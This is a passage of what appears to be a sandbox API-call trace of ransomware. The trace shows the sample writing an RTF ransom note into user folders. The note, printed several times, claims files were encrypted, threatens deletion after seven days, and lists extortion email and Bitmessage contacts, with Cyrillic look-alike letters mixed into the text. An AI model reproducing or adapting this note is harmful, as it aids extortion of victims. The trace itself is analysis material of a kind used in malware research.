th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.740] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.741] CloseHandle (hObject=0x228) returned 1 [0284.741] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0284.741] GetLastError () returned 0x2 [0284.741] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 